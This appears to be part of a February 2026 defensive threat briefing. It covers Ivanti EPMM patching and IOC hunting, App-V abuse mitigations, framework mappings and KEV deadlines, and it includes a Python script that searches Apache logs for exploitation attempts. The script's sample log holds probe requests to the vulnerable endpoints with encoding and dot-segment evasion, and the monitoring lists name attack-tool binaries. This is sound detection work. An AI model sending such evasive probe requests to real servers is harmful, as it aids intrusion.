- Disable the App-V client if it is not in use (`Disable-Appv`; it is a Windows feature, not an Appx package, so `Get-AppxPackage *appv*` generally returns nothing) and block `SyncAppvPublishingServer.vbs` with AppLocker/WDAC, because the script stays in System32 either way
- Enable PowerShell Script Block Logging (Event ID 4104)
- Monitor for: mshta.exe, wscript.exe, SyncAppvPublishingServer.vbs
Framework Alignment: CIS Control 4.8, NIST CSF PR.PT-3, MITRE ATT&CK T1059.001
5. Ivanti EPMM: Emergency Patching and IOC Hunt
Why: PoC public; exploitation within 24 hours; 3-day CISA deadline
How:
- Apply RPM patches immediately
- Check Apache access logs for requests to `/mifs/c/aftstore/fob/` and `/mifs/c/appstore/fob/`
- Hunt for web shells in EPMM directories
- Monitor for reverse shell connections
- If internet-exposed without patch, initiate incident response
Framework Alignment: CIS Control 7.1, NIST CSF DE.CM-8, CISA BOD 22-01
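The log check above (and the IR trigger in Story 4) is quick to script. The following is an added example, not Ivanti, watchTowr or Shadowserver tooling: it parses Apache combined-format access-log lines, normalises the request path (percent-decoding and collapsing double slashes and dot segments) so trivial evasions still match, and summarises every request to the two named endpoints per source IP with methods, status codes and user agents. The SAMPLE_LOG lines are constructed; the addresses are from documentation ranges (203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24).

```python
"""Hunt for CVE-2026-1281/1340 exploitation attempts in EPMM httpd access logs.

Added example, not Ivanti, watchTowr or Shadowserver tooling. Parses
Apache combined-format lines, normalises the path so percent-encoding
and dot-segment tricks still match, and summarises hits on the two
endpoints named in the briefing per source IP. SAMPLE_LOG is constructed.
"""
import posixpath
import re
from urllib.parse import unquote

WATCH_PATHS = ("/mifs/c/aftstore/fob", "/mifs/c/appstore/fob")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)


def parse_line(line: str):
    """Combined-format fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_path(path: str) -> str:
    """Strip the query string, percent-decode, collapse //, /./ and /../ segments."""
    path = unquote(path.split("?", 1)[0])
    return posixpath.normpath(path).lower()


def is_watch_path(path: str) -> bool:
    p = normalize_path(path)
    return any(p == w or p.startswith(w + "/") for w in WATCH_PATHS)


def summarize(lines) -> dict:
    """Per-source-IP summary of requests to the watched endpoints.

    `first`/`last` assume the input is in log order. Works on any iterable
    of lines, so summarize(open("access_log")) is fine.
    """
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_watch_path(rec["path"]):
            continue
        entry = hits.setdefault(rec["ip"], {
            "count": 0, "methods": set(), "statuses": set(), "user_agents": set(),
            "first": rec["ts"], "last": rec["ts"]})
        entry["count"] += 1
        entry["methods"].add(rec["method"])
        entry["statuses"].add(rec["status"])
        if rec.get("ua"):
            entry["user_agents"].add(rec["ua"])
        entry["last"] = rec["ts"]
    for entry in hits.values():
        for k in ("methods", "statuses", "user_agents"):
            entry[k] = sorted(entry[k])
    return hits


# Constructed log lines: two scanners probing the endpoints (one with
# encoding and dot-segment evasion), a legitimate admin, and a junk line.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jan/2026:02:14:09 +0000] "POST /mifs/c/appstore/fob/ HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [30/Jan/2026:02:14:11 +0000] "GET /mifs/c/appstore/fob/ HTTP/1.1" 200 1024 "-" "python-requests/2.31"',
    '192.0.2.10 - - [30/Jan/2026:03:05:00 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/Jan/2026:03:05:02 +0000] "GET /mifs/c/appstore/help HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [30/Jan/2026:03:01:45 +0000] "POST /mifs/c/%61ftstore/fob/ HTTP/1.1" 500 233 "-" "curl/8.5.0"',
    '198.51.100.22 - - [30/Jan/2026:03:02:10 +0000] "POST /mifs/c//aftstore/fob/../fob/ HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    "garbage line that is not in combined log format",
]

if __name__ == "__main__":
    for ip, e in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {e['count']} hits {e['methods']} status {e['statuses']} "
              f"{e['first']} .. {e['last']} ua={e['user_agents']}")
```

A request to these paths is evidence of an attempt, not of success; prioritise source IPs whose POSTs returned 2xx, then pivot to web-shell hunting and outbound connections from the appliance for the same time window. Logs that only begin after the patch date prove nothing about the exposure window.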
9. Framework Alignment Matrix
| Vulnerability/Threat | CIS Controls v8 | NIST CSF 1.1 | ISO 27001:2013 Annex A | MITRE ATT&CK | CISA Guidance |
|---|---|---|---|---|---|
| Notepad++ Supply Chain | 2.3, 2.7, 7.1 | PR.DS-6, PR.IP-12 | A.14.2.5, A.12.6.1 | T1195.002, T1059 | Supply Chain Risk |
| WinRAR CVE-2025-8088 | 9.5, 7.1, 14.3 | PR.AT-1, PR.IP-12 | A.7.2.2, A.12.6.1 | T1566.001, T1547.001 | KEV Catalog |
| MaliciousCorgi Extensions | 2.7, 16.2, 6.5 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1195.002, T1555 | Supply Chain Risk |
| CVE-2026-1281 (Ivanti) | 7.1, 7.3, 12.1 | PR.IP-12, DE.CM-8 | A.12.6.1 | T1190, T1059 | BOD 22-01 |
| CVE-2026-24858 (Fortinet) | 6.3, 6.5, 7.1 | PR.AC-7, PR.IP-12 | A.9.4.2 | T1078 | KEV Catalog |
| CVE-2026-21509 (Office) | 9.5, 14.3 | PR.DS-5, PR.AT-1 | A.13.2.1 | T1566.001 | KEV Catalog |
| ClickFix/App-V Abuse | 4.8, 14.6, 8.2 | PR.PT-3, PR.AT-1 | A.7.2.2 | T1059.001, T1204 | User Awareness |
| Chrome AI Extensions | 2.7, 16.2 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1176, T1555 | Browser Security |
| GlassWorm Supply Chain | 2.7, 16.2 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1195.002 | Supply Chain Risk |
| Poland Energy (Sandworm) | 5.2, 12.8 | PR.AC-1, DE.AE-2 | A.12.4.1 | T1078.001, T1485 | ICS Advisory |
10. Upcoming Security Events
| Date | Event | Action Required |
|---|---|---|
| Feb 1, 2026 | CVE-2026-1281 (Ivanti EPMM) CISA KEV Deadline | Patch or discontinue use |
| Feb 3, 2026 | CVE-2026-20805 (Windows DWM) CISA KEV Deadline | Apply January patches |
| Feb 11, 2026 | February 2026 Patch Tuesday | Plan testing cycle |
| Feb 16, 2026 | CVE-2026-21509 (Office) CISA KEV Deadline | Apply OOB updates |
| Feb 16, 2026 | CVE-2026-24061 (GNU InetUtils) CISA KEV Deadline | Patch telnetd |
| Ongoing | MaliciousCorgi/Chrome Extensions | Monitor for marketplace removal |
11. Sources
Supply Chain & Developer Tool Threats:
- TechCrunch (Notepad++): https://techcrunch.com/2026/02/02/notepad-plus-plus-chinese-government-hackers/
- Rapid7 (Chrysalis Analysis): https://www.rapid7.com/blog/
- Koi Security (MaliciousCorgi): https://www.koi.ai/blog/maliciouscorgi/
- OX Security (Chrome Extensions): https://www.ox.security/blog/
- Socket Security (GlassWorm): https://socket.dev/blog/glassworm-loader-open-vsx/
Nation-State Activity:
- Google Threat Intelligence (WinRAR): https://cloud.google.com/blog/topics/threat-intelligence/winrar-zero-day-exploitation/
- Kaspersky (Notepad++ infection chains): https://www.kaspersky.com/
- Dragos (Poland/Sandworm): https://www.dragos.com/blog/poland-power-grid-attack-electrum/
Vendor Advisories:
- CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- Ivanti Security Advisory: https://forums.ivanti.com/
- Fortinet PSIRT FG-IR-26-060: https://fortiguard.fortinet.com/psirt/FG-IR-26-060
- Microsoft MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
Security News:
- BleepingComputer: https://www.bleepingcomputer.com
- The Hacker News: https://thehackernews.com
- SecurityWeek: https://www.securityweek.com
- Help Net Security: https://www.helpnetsecurity.com
Document Version: 1.0
Last Updated: February 3, 2026, 14:00 EST
Next Briefing: February 9, 2026